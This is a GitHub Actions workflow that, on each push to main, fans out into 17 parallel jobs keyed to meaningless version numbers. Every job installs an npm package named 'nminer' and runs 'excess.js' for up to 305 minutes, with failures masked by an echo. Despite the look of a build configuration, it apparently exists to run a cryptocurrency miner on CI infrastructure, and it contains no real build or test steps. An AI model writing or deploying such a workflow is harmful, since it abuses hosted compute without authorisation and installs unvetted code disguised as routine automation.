name: excess
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2216 }
          - { version: 2976 }
          - { version: 3023 }
          - { version: 924 }
          - { version: 3668 }
          - { version: 1732 }
          - { version: 8296 }
          - { version: 5552 }
          - { version: 5290 }
          - { version: 5614 }
          - { version: 6720 }
          - { version: 9039 }
          - { version: 2425 }
          - { version: 9632 }
          - { version: 190 }
          - { version: 3769 }
          - { version: 9419 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 305m node excess.js || echo "excess executed"